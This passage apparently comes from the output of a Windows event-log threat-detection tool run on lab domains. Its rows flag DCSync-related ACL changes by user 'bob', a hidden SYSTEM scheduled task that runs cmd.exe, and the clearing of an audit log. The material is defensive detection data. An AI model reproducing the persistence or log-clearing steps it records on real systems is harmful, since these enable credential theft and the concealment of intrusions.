f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-73860
9754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e
2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242593 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c
04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa
5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + 
+",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198238040 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242592 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-
5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-41
89121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242591 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d
1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-2
1-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242590 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA
;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;D